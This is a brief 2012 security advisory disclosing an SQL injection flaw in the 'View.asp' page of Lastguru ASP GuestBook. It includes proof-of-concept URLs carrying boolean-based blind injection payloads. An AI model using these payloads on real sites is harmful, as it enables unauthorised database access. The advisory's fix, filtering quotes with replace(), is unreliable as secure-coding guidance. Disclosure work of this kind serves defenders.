Title: Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability Product : Lastguru ASP GuestBook
Version : Free Version Vendor: http://www.LastGuru.com Class: Input Validation Error CVE: Remote: Yes Local: No Published: 2012-03-04 Updated: Impact : Medium (CVSSv2 Base : 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P) Bug Description : Page 'View.asp' of Lastguru ASP GuestBook(Free Version) is vulnerable with SQL Injection Vulnerability. POC: #------------------------------------------------------------- http://victim/[email protected]' and 'a'='a http://victim/[email protected]' and 'a'='b http://victim/[email protected]' and 0<(select count(*) from [book]) and 'a'='a etc... #------------------------------------------------------------- Advice: Use 'replace()' for filtering single quote and other dangerous symbols. Credits : This vulnerability was discovered by [email protected] mail: [email protected] / [email protected] Pentester/Researcher Dark2S Security Team/PolyU.HK
